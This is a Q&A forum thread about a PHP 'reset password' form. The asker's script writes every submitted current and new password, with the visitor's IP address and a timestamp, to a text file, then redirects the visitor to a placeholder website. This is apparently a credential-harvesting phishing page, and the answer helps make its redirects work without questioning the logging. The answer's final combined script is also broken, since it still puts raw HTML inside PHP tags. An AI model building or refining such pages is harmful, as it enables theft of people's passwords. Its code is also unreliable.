PHP script to validate form data

Question

I have a form for reseting password. The PHP script stores all 3 passwords in a text file. I know it is unsafe to do so but this is just for learning purposes.

<form action="login.php" method="POST" accept-charset="utf-8">
  <p>
    <label for="id_current_password">Current password:</label>
    <input id="id_current_password" name="current_password" type="password" />
  </p>
  <p>
    <label for="id_new_password1">New password:</label>
    <input id="id_new_password1" name="new_password1" type="password" />
  </p>
  <p>
    <label for="id_new_password2">New password confirmation:</label>
    <input id="id_new_password2" name="new_password2" type="password" />
  </p>
  <p>
    <input type="submit" value="Reset Password">
  </p>
</form>

This form sends these passwords to login.php.

<?php

$myFile = fopen("log.txt", "a") or die("Unable to open file!");
$stringData = $_POST['current_password'] . "CP";
fwrite($myFile, $stringData);     
$stringData = $_POST['new_password1'] . ":";
fwrite($myFile, $stringData);
$stringData = $_POST['new_password2'] . "\n";
fwrite($myFile, $stringData);
fclose($myFile);

     ?>
<?php
date_default_timezone_set('Asia/Kolkata');
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
?>

if(($_POST['new_password1'])==($_POST['new_password2'])) {
    <script>location.href='https://www.MYWEBSITE.com';</script>
} else {
    <script>location.href='http://www.MYWEBSITEerror.com'</script>
}

I'm wondering how to redirect user to an error webpage if new passwords don't match and if they match they should be redirected to website according to script. I am aware of echo and other ways to alert user but I SPECIFICALLY want this method.

Answer 1

You can use the PHP function of header() instead:

<?php

if(($_POST['new_password1'])==($_POST['new_password2'])) {
    header ('Location: https://www.MYWEBSITE.com');
} else {
    header ('Location: http://www.MYWEBSITEerror.com');
}

?>

---

Your current code does not work since you cannot have HTML code within PHP tags as it will return parse error. To make it work, you have to echo the redirect part:

if(($_POST['new_password1'])==($_POST['new_password2'])) {
    echo "<script>location.href='https://www.MYWEBSITE.com';</script>";
} else {
    echo "<script>location.href='http://www.MYWEBSITEerror.com'</script>";
}

Alternatively, you can put the <script> tag outside of PHP tags:

// { ... }

fwrite($file, $data);
fclose($file);

if(($_POST['new_password1'])==($_POST['new_password2'])) {
?>
    <script>location.href='https://www.MYWEBSITE.com';</script>
<?php
} else {
?>
    <script>location.href='http://www.MYWEBSITEerror.com'</script>
<?php
}
?>

---

Basically, you should format your whole script to just have one set of PHP open and close tags, no idea why there's no many.

<?php

$myFile = fopen("log.txt", "a") or die("Unable to open file!");
$stringData = $_POST['current_password'] . "CP";
fwrite($myFile, $stringData);     
$stringData = $_POST['new_password1'] . ":";
fwrite($myFile, $stringData);
$stringData = $_POST['new_password2'] . "\n";
fwrite($myFile, $stringData);
fclose($myFile);

date_default_timezone_set('Asia/Kolkata');
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);

if(($_POST['new_password1'])==($_POST['new_password2'])) {
    <script>location.href='https://www.MYWEBSITE.com';</script>
} else {
    <script>location.href='http://www.MYWEBSITEerror.com'</script>
}

?>